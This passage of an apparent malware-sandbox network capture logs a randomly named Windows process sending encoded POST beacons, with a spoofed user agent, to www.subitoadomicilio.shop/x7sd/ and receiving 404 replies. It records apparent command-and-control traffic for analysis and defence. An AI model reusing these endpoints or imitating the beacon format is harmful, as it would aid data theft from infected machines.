                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:27:12.068170071 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 13 Sep 2024 10:27:11 GMT
                      Content-Type: text/html
                      Content-Length: 58288
                      Connection: close
                      Vary: Accept-Encoding
                      ETag: "6691ebc2-e3b0"
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                      Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                      Sep 13, 2024 12:27:12.068217993 CEST | 1236 | IN | Data Raw: 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62
                      Data Ascii: dy><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASUR
                      Sep 13, 2024 12:27:12.068249941 CEST | 1236 | IN | Data Raw: 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d 58 54 35 43 59 56 56 42 4d 41 58 4f 43 68 6b 57 63
                      Data Ascii: WG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6w
                      Sep 13, 2024 12:27:12.068283081 CEST | 672 | IN | Data Raw: 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38 64 7a 79 6a 6b 32 49 61 42 4b 41 4e 73 69 33 38 36
                      Data Ascii: 1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZ
                      Sep 13, 2024 12:27:12.068316936 CEST | 1236 | IN | Data Raw: 4c 36 53 38 48 77 44 77 30 64 49 57 69 4b 77 4b 43 68 2f 78 31 67 4a 6f 43 59 31 71 39 34 6a 69 51 74 2f 6e 49 6e 4e 51 78 49 50 69 41 59 7a 42 70 30 70 41 53 53 39 59 37 54 6f 73 66 2f 43 4b 70 76 34 65 46 4f 4c 78 2f 69 37 6b 6c 37 50 2f 34 31
                      Data Ascii: L6S8HwDw0dIWiKwKCh/x1gJoCY1q94jiQt/nInNQxIPiAYzBp0pASS9Y7Tosf/CKpv4eFOLx/i7kl7P/41Uc+Rd1ngHQ8aoEpGRxCA60J/J2nc2IfSTOZ9mR8e8AeL+oixKyM1+9NbzD6g6rjoUKRBVEiZWWJCopMVaSMQQzhlIMqNrs245++9/b9q8MSK27uI2gUamfAXBQlNhdibFEkUn3LJKUZBXFu2qOSzp0eXc0dG0jbTT
                      Sep 13, 2024 12:27:12.068346024 CEST | 64 | IN | Data Raw: 4d 42 2b 32 31 52 49 41 41 41 77 49 32 48 37 35 37 6b 71 32 49 48 34 37 72 4f 4a 4d 47 36 59 61 41 4d 74 6f 65 4b 73 33 6d 6c 61 73 64 49 35 41 4f 62 62 61 46 53 55 70 47 42 7a 4c 41 5a 67 74
                      Data Ascii: MB+21RIAAAwI2H757kq2IH47rOJMG6YaAMtoeKs3mlasdI5AObbaFSUpGBzLAZgt
                      Sep 13, 2024 12:27:12.069057941 CEST | 1236 | IN | Data Raw: 68 79 57 68 6b 4b 72 52 48 70 7a 48 4b 59 65 31 2b 75 68 4d 6f 63 78 6e 52 64 5a 59 65 48 4a 68 4d 4d 46 6d 39 52 56 4b 46 69 57 57 43 5a 36 33 6d 62 34 44 78 71 77 34 63 66 57 4d 57 62 53 2b 7a 68 34 75 31 50 6b 49 48 4e 48 52 6c 32 74 4f 2b 42
                      Data Ascii: hyWhkKrRHpzHKYe1+uhMocxnRdZYeHJhMMFm9RVKFiWWCZ63mb4Dxqw4cfWMWbS+zh4u1PkIHNHRl2tO+Brdmk8FoGRtbAmLiv1Ogd0/mn4hkUYABiW2VsaarTwxeTr7LG4MGNtvw1QNtRDed/WODIGj07balBgrUzUoKBtygG9RiFBQjedJZOXJyUVVHbKJww6r5qI2vkEqre/Qps0GT44d/p7BqPckeOYhMTEbcrJxUeQwBjO
                      Sep 13, 2024 12:27:12.069089890 CEST | 1236 | IN | Data Raw: 79 4a 70 69 56 51 43 6f 66 4c 57 71 33 77 62 57 71 31 4b 78 37 36 4b 74 46 2f 64 65 54 54 77 4b 58 38 30 64 4a 45 6f 62 77 66 41 47 4e 48 2b 46 37 79 6a 42 34 54 57 73 58 4b 74 35 30 37 6d 55 4f 2f 4e 4f 76 44 64 2f 31 37 32 73 74 44 47 42 47 74
                      Data Ascii: yJpiVQCofLWq3wbWq1Kx76KtF/deTTwKX80dJEobwfAGNH+F7yjB4TWsXKt507mUO/NOvDd/172stDGBGt3yz48bF044+FtUKa1PR564/AUpNQCaARgNYDuAGINRP9Ng1NsKgPxXwxizWU0l22zpuHvw2FxYxV1FGuWYLwV5qcoyhkKjpAk492rtCXPxetPxANkSDEwE8A6LMtrWbfoP0C9khglAXwBn7dkmZ5s+M16fUQ1Xkt5
                      Sep 13, 2024 12:27:12.069123030 CEST | 1236 | IN | Data Raw: 2b 4f 6e 73 54 51 65 42 66 33 48 36 6b 38 47 6f 39 7a 55 59 39 52 38 67 62 79 6b 48 77 43 44 59 63 46 59 41 34 4b 39 56 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41
                      Data Ascii: +OnsTQeBf3H6k8Go9zUY9R8gbykHwCDYcFYA4K9VzetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXG
                      Sep 13, 2024 12:27:12.069155931 CEST | 672 | IN | Data Raw: 67 49 72 6e 34 75 6e 46 39 33 4f 68 34 70 57 45 35 5a 78 6a 55 62 48 2f 32 41 30 6b 67 31 46 66 77 68 43 72 6e 77 44 43 66 73 6a 72 6e 62 62 7a 57 2f 4d 67 51 6c 61 51 6c 33 62 30 35 54 75 70 58 51 63 76 32 56 49 4a 4c 39 63 37 42 37 58 77 61 41
                      Data Ascii: gIrn4unF93Oh4pWE5ZxjUbH/2A0kg1FfwhCrnwDCfsjrnbbzW/MgQlaQl3b05TupXQcv2VIJL9c7B7XwaAAuhy9wIHM+vLj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/
                      Sep 13, 2024 12:27:12.073551893 CEST | 1236 | IN | Data Raw: 58 77 4b 6f 72 76 51 36 41 74 4c 4b 2b 4f 67 2b 2b 6c 43 79 74 71 38 2b 2b 59 64 32 4b 4f 57 2f 74 38 69 48 4a 32 45 2f 47 71 75 36 30 38 42 51 41 77 68 76 35 54 74 7a 48 38 44 71 59 76 30 48 34 41 4b 48 39 56 61 39 38 43 54 49 6d 6b 31 2f 6b 6d
                      Data Ascii: XwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5TtzH8DqYv0H4AKH9Va98CTImk1/kmu19Npw7qtJR/vH9LBKYlHJjTqtIEwJVAlxo/ZtOFPdv0QjNcd/6+Dt60BOA4g2xA5v6kT33YR4GQoUMe9n5XSp2ahxKkR2CAAgsfvsStp9qyRVzxt13n6jbrspNKzlMBBsJdkCYEXplj/xMMbmAcqKblgkqf+2K9O


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 50402 | 195.24.68.25 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:27:35.725639105 CEST | 769 | OUT | POST /x7sd/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.subitoadomicilio.shop
                      Origin: http://www.subitoadomicilio.shop
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.subitoadomicilio.shop/x7sd/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4d 5a 67 2f 58 44 74 6d 4a 4b 63 36 36 66 44 66 53 69 69 42 72 65 66 4e 54 67 49 35 49 62 62 61 4b 62 69 51 66 76 5a 53 69 6a 36 6b 41 36 46 59 33 42 6b 30 57 34 54 76 32 6c 4f 6b 38 6d 64 44 42 30 4c 54 7a 32 65 4f 68 2f 48 6a 4b 4e 69 56 36 32 6c 52 47 44 72 6f 66 43 45 2f 65 4e 50 59 68 46 59 66 47 66 6b 43 43 43 47 50 46 37 4c 45 6b 35 6f 43 48 33 43 4e 79 37 36 5a 70 4f 64 34 4f 55 2f 39 39 73 4a 45 35 46 79 74 31 44 62 6d 7a 73 6f 45 79 6c 4a 73 56 76 58 50 4d 6c 53 48 73 37 64 64 32 61 59 31 35 70 48 54 31 58 67 58 68 72 2b 45 56 77 3d 3d
                      Data Ascii: MtXH8dRH=8zK/CYulK3elMZg/XDtmJKc66fDfSiiBrefNTgI5IbbaKbiQfvZSij6kA6FY3Bk0W4Tv2lOk8mdDB0LTz2eOh/HjKNiV62lRGDrofCE/eNPYhFYfGfkCCCGPF7LEk5oCH3CNy76ZpOd4OU/99sJE5Fyt1DbmzsoEylJsVvXPMlSHs7dd2aY15pHT1XgXhr+EVw==
                      Sep 13, 2024 12:27:36.406054020 CEST | 591 | IN | HTTP/1.1 404 Not Found
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:27:36 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 424
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 50403 | 195.24.68.25 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:27:38.277626038 CEST | 789 | OUT | POST /x7sd/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.subitoadomicilio.shop
                      Origin: http://www.subitoadomicilio.shop
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.subitoadomicilio.shop/x7sd/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4e 36 49 2f 56 67 56 6d 4f 71 63 35 6d 76 44 66 5a 43 69 37 72 65 54 4e 54 6b 77 58 4c 75 4c 61 4b 37 53 51 65 72 4e 53 68 6a 36 6b 50 61 46 5a 71 78 6c 36 57 34 57 63 32 6e 61 6b 38 6d 35 44 42 31 62 54 7a 48 65 4e 6a 76 48 74 54 64 69 74 2b 32 6c 52 47 44 72 6f 66 47 73 56 65 4e 58 59 68 56 45 66 55 75 6b 46 4b 69 47 4f 41 4c 4c 45 67 35 6f 65 48 33 43 6a 79 36 6e 79 70 4d 31 34 4f 55 50 39 39 2b 78 48 33 46 79 76 71 7a 61 44 38 75 45 50 2f 31 64 6a 4b 73 54 47 47 6c 4b 72 70 39 4d 48 6e 72 35 69 72 70 6a 67 6f 51 70 6a 73 6f 44 4e 4f 34 54 71 69 32 62 45 4e 64 4b 43 47 58 56 38 4f 4e 57 48 41 68 38 3d
                      Data Ascii: MtXH8dRH=8zK/CYulK3elN6I/VgVmOqc5mvDfZCi7reTNTkwXLuLaK7SQerNShj6kPaFZqxl6W4Wc2nak8m5DB1bTzHeNjvHtTdit+2lRGDrofGsVeNXYhVEfUukFKiGOALLEg5oeH3Cjy6nypM14OUP99+xH3FyvqzaD8uEP/1djKsTGGlKrp9MHnr5irpjgoQpjsoDNO4Tqi2bENdKCGXV8ONWHAh8=
                      Sep 13, 2024 12:27:38.981177092 CEST | 591 | IN | HTTP/1.1 404 Not Found
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:27:38 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 424
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.4 | 50404 | 195.24.68.25 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:27:40.826318979 CEST | 10871 | OUT | POST /x7sd/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.subitoadomicilio.shop
                      Origin: http://www.subitoadomicilio.shop
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.subitoadomicilio.shop/x7sd/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4e 36 49 2f 56 67 56 6d 4f 71 63 35 6d 76 44 66 5a 43 69 37 72 65 54 4e 54 6b 77 58 4c 75 44 61 4a 49 71 51 66 4d 78 53 67 6a 36 6b 52 71 46 63 71 78 6c 33 57 34 75 44 32 6e 57 53 38 6b 52 44 44 58 44 54 37 56 6d 4e 70 76 48 74 63 39 69 57 36 32 6c 45 47 44 37 73 66 43 41 56 65 4e 58 59 68 55 30 66 44 76 6b 46 48 43 47 50 46 37 4c 79 6b 35 6f 36 48 33 4b 56 79 36 53 4a 70 38 56 34 4f 77 72 39 2f 4c 6c 48 2f 46 79 70 72 7a 61 68 38 75 4a 58 2f 31 41 53 4b 76 50 2f 47 6e 57 72 6b 71 78 52 36 6f 68 75 2f 36 4f 7a 7a 41 63 48 72 61 62 59 44 36 62 4f 6a 6d 32 64 4f 50 32 70 4b 51 38 45 62 4d 43 78 43 6c 4e 4d 6f 56 72 31 71 4d 66 4a 47 49 64 6f 6e 31 78 57 6a 6c 2b 78 64 75 45 4f 6e 4d 2b 62 6c 66 74 62 39 50 6f 69 2b 49 75 52 4b 5a 51 41 65 79 4b 50 38 69 44 2f 41 6a 47 31 42 6b 43 61 31 6b 6c 57 6e 35 51 36 6c 47 4e 33 6f 43 69 69 33 69 64 65 51 75 51 39 4f 53 49 38 73 55 6a 4b 57 33 38 53 57 53 50 39 6c 76 34 75 49 4c 66 2b 69 4b 4b 50 6f [TRUNCATED]
                      Data Ascii: MtXH8dRH= [TRUNCATED]
                      Sep 13, 2024 12:27:41.509322882 CEST | 591 | IN | HTTP/1.1 404 Not Found
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:27:41 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 424
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.4 | 50405 | 195.24.68.25 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:27:43.373795033 CEST | 491 | OUT | GET /x7sd/?EB04T=0hSTF8phw&MtXH8dRH=xxifBtz+TGalALhNcyBTN44Pt4/Sbh2VoP/cWgYTPpbNJICDVfxFhRGjE7kr1iNtdvbH3kOKnhtRMn3Y82SlrP3cRd6my2NsPT3JF2gfd9Xq5l5DKuckTiI= HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.subitoadomicilio.shop
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:27:44.114605904 CEST | 591 | IN | HTTP/1.1 404 Not Found
                      Server: openresty
                      Date: Fri, 13 Sep 2024 10:27:43 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 424
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 43 65 6e 74 4f 53 20 53 74 [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.58 (CentOS Stream) PHP/7.4.33 Server at www.subitoadomicilio.shop Port 80</address></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.4 | 50406 | 162.0.213.94 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
